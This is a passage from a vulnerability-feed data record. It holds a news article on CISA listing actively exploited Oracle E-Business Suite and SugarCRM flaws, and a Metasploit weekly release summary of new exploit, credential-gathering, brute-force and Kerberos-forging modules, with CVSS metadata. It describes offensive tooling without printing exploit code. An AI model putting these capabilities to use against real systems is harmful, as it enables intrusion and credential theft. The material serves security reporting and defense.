Catalog, citing evidence of active exploitation.\n\nThe first of the two vulnerabilities is [CVE-2022-21587](<https://nvd.nist.gov/vuln/detail/CVE-2022-21587>) (CVSS score: 9.8), a critical issue impacting versions 12.2.3 to 12.2.11 of the Oracle Web Applications Desktop Integrator product.\n\n\"Oracle E-Business Suite contains an unspecified vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator,\" CISA [said](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nThe issue was addressed by Oracle as part of its [Critical Patch Update](<https://www.oracle.com/security-alerts/cpuoct2022.html>) released in October 2022. Not much is known about the nature of the attacks exploiting the vulnerability, but the development follows the [publication](<https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/>) of a proof-of-concept (PoC) by cybersecurity firm Viettel on January 16, 2023.\n\nThe second security flaw to be added to the KEV catalog is [CVE-2023-22952](<https://nvd.nist.gov/vuln/detail/CVE-2023-22952>) (CVSS score: 8.8), which relates to a case of [missing input validation](<https://thehackernews.com/2023/01/cacti-servers-under-attack-as-majority.html>) in SugarCRM that could result in the injection of arbitrary PHP code. The bug has been fixed in SugarCRM versions 11.0.5 and 12.0.2.\n\nThe development comes a week after CISA also added [CVE-2017-11357](<https://nvd.nist.gov/vuln/detail/CVE-2017-11357>) (CVSS score: 9.8), a severe security vulnerability impacting Telerik UI that could facilitate arbitrary file uploads or remote code execution.\n\nIn light of active exploitation attempts, Federal Civilian Executive Branch (FCEB) agencies in the U.S. are required to apply the patches by February 23, 2023.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-03T05:23:00", "type": "thn", "title": "CISA Alert: Oracle E-Business Suite and SugarCRM Vulnerabilities Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11357", "CVE-2022-21587", "CVE-2023-22952"], "modified": "2023-02-03T15:02:56", "id": "THN:8DEF040F235E88FCB18313526D0E4C2F", "href": "https://thehackernews.com/2023/02/cisa-alert-oracle-e-business-suite-and.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2023-03-10T20:15:00", "description": "## Wowza, a new credential gatherer and login scanner!\n\n\n\nThis week Metasploit Framework gained a credential gatherer for Wowza Streaming Engine Manager. Credentials for this application are stored in a file named `admin.password` in a known location and the file is readable by default by `BUILTIN\\Users` on Windows and is world readable on Linux.. The module was written by community contributor [bcoles](<https://github.com/bcoles>) who also wrote a login scanner for Wowza this week. The login scanner can be used to validate the credentials found by the gatherer. The two modules complement each other quite nicely.\n\n## New module content (3)\n\n### Wowza Streaming Engine Manager Login Utility\n\nAuthor: bcoles \nType: Auxiliary \nPull request: [#17733](<https://github.com/rapid7/metasploit-framework/pull/17733>) contributed by [bcoles](<https://github.com/bcoles>)\n\nDescription: This adds a login scanner module to brute force credentials of Wowza Streaming Engine Manager.\n\n### SugarCRM unauthenticated Remote Code Execution (RCE)\n\nAuthors: Sw33t.0day and h00die-gr3y \nType: Exploit \nPull request: [#17507](<https://github.com/rapid7/metasploit-framework/pull/17507>) contributed by [h00die-gr3y](<https://github.com/h00die-gr3y>) \nAttackerKB reference: [CVE-2023-22952](<https://attackerkb.com/topics/E486ui94II/cve-2023-22952?referrer=blog>)\n\nDescription: A module has been added which exploits CVE-2023-22952, a RCE vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2. Successful exploitation as an unauthenticated attacker will result in remote code execution as the user running the web services, which is typically `www-data`.\n\n### Gather Wowza Streaming Engine Credentials\n\nAuthor: bcoles \nType: Post \nPull request: [#17737](<https://github.com/rapid7/metasploit-framework/pull/17737>) contributed by [bcoles](<https://github.com/bcoles>)\n\nDescription: This adds a post module that collects Wowza Streaming Engine user credentials from the `admin.password` local configuration file. This file is world-readable by default on Linux and readable by `BUILTIN\\Users` on Windows.\n\n## Enhancements and features (9)\n\n * [#17675](<https://github.com/rapid7/metasploit-framework/pull/17675>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates the `admin/kerberos/forge_ticket` to support a new `extra_sids` option which can be useful for including cross-domain SIDs for forging external Kerberos trust tickets as part of cross-trust domain escalation. The `admin/kerberos/inspect_ticket` has also been updated to support viewing these extra SID values.\n * [#17686](<https://github.com/rapid7/metasploit-framework/pull/17686>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds 3 additional methods to the existing PetitPotam module to make it work even if the patch for CVE-2021-36942 has been installed. Note that it won't work after the December 2021 patch.\n * [#17715](<https://github.com/rapid7/metasploit-framework/pull/17715>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The Metasploit Payload gem has been bumped to 2.0.115, bringing in support for the `arp` command to Python Meterpreter on Linux, and adding support for displaying IPv6 routing tables using the `route` command on Windows.\n * [#17727](<https://github.com/rapid7/metasploit-framework/pull/17727>) from [rohitkumarankam](<https://github.com/rohitkumarankam>) \\- Two new options have been added to the login scanner library: `max_consecutive_error_count` and `max_error_count`. These options allow users to set the maximum number of errors that are allowed to occur when connecting as well as the maximum number of consecutive errors that are allowed when connecting before the login scanner will give up on a target.\n * [#17744](<https://github.com/rapid7/metasploit-framework/pull/17744>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The code for `msfconsole` has been updated so that performance profiling can also take into account the time it takes to load `msfenv` and console related libraries, thereby allowing for more accurate performance profiling.\n * [#17745](<https://github.com/rapid7/metasploit-framework/pull/17745>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This updates the metasploit-payloads gem to pull in changes to the Python Meterpreter on Windows to add the `route add` and `route delete` commands as well as the ability to get process information such as process names and paths.\n * [#17746](<https://github.com/rapid7/metasploit-framework/pull/17746>) from [todb-r7](<https://github.com/todb-r7>) \\- The `data/wordlists/password.lst` password list has been updated to include the master password that LastPass suggests as an example when a user goes to create a new master password, `r50$K28vaIFiYxaY`, into the password list, as well as to fix some encoding issues.\n * [#17749](<https://github.com/rapid7/metasploit-framework/pull/17749>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates the `auxiliary/admin/kerberos/keytab.rb` module to additionally export any NTHASHES, which can be useful for decrypting Kerberos network traffic in Wireshark.\n * [#17756](<https://github.com/rapid7/metasploit-framework/pull/17756>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates secrets dump to generate the Kerberos RC4 key for the machine account.\n\n## Bugs fixed (8)\n\n * [#17673](<https://github.com/rapid7/metasploit-framework/pull/17673>) from [bcoles](<https://github.com/bcoles>) \\- `lib/msf/core/payload/apk.rb` has been updated so that by default it only decompiles the main classes instead of all classes, fixing some issues whereby decompiling all classes would prevent creation of a backdoored APK. This also bumps up the minimum `apktool` version to 2.4.1 and makes it so that versions prior to 2.7.0 of `apktool` will throw a warning about being potentially out of date.\n * [#17716](<https://github.com/rapid7/metasploit-framework/pull/17716>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A bug has been fixed whereby the reverse port forward information message was displayed incorrectly, and the same information was shown on both the local and remote parts of the message.\n * [#17721](<https://github.com/rapid7/metasploit-framework/pull/17721>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes an issue where payloads that were adapted failed when stage encoding was enabled because the stage encoding was based on the stager arch and platform values. These values were always the same until we introduced adapted payloads, which can vary.\n * [#17723](<https://github.com/rapid7/metasploit-framework/pull/17723>) from [jvoisin](<https://github.com/jvoisin>) \\- A bug has been fixed in the `modules/encoders/php/base64.rb` encoder whereby strings were being passed as literal strings without being properly quoted, which could result in errors on newer versions of PHP.\n * [#17726](<https://github.com/rapid7/metasploit-framework/pull/17726>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The Metasploit Payloads gem has been updated bringing in initial support for attaching to processes on Python Meterpreter shells on Windows, a bug fix for the `route` command on newer versions of Windows on Windows Meterpreter, and a fix so that both C Meterpreter and Python Meterpreter sessions will attempt to enable the same set of permissions when running `getprivs`.\n * [#17729](<https://github.com/rapid7/metasploit-framework/pull/17729>) from [bcoles](<https://github.com/bcoles>) \\- Fixes an edge case crash when running Ruby 3.2\n * [#17738](<https://github.com/rapid7/metasploit-framework/pull/17738>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fix Ruby 3.2 crash when running certain tools\n * [#17758](<https://github.com/rapid7/metasploit-framework/pull/17758>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The metasploit-payloads gem has been bumped to fix a token handle leak that was causing Python Meterpreters to leave dangling handles after using `getprivs`, fix a error in `packet_transmit_http` whereby error codes were not appropriately returned, and update the `arp` command to properly return the interface name instead of the index for the `interface` column.\n\n## Documentation added (3)\n\n * [#17684](<https://github.com/rapid7/metasploit-framework/pull/17684>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR adds the RBCD exploitation documentation to the docs site.\n * [#17688](<https://github.com/rapid7/metasploit-framework/pull/17688>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR fixes several broken wiki links, as well as adding validation to users users don't use the wrong syntax when making docs changes.\n * [#17743](<https://github.com/rapid7/metasploit-framework/pull/17743>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- A new page has been added to explain the `METASPLOIT_CPU_PROFILE` and `METASPLOIT_MEMORY_PROFILE` options and to explain how to profile `msfconsole`'s and `msfvenom`'s performance on systems.\n\nYou can always find more documentation on our docsite at [docs.metasploit.com](<https://docs.metasploit.com/>).\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.3.5...6.3.6](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222023-03-02T14%3A22%3A58%2B00%3A00..2023-03-09T19%3A29%3A16%2B01%3A00%22>)\n * [Full diff 6.3.5...6.3.6](<https://github.com/rapid7/metasploit-framework/compare/6.3.5...6.3.6>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-10T19:00:00", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942", "CVE-2023-22952"], "modified": "2023-03-10T19:00:00", "id": "RAPID7BLOG:A7E1C05842DF5C07D9B1BA23B2235727", "href": "https://blog.rapid7.com/2023/03/10/metasploit-weekly-wrap-up-196/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}
CVE-2023-22952
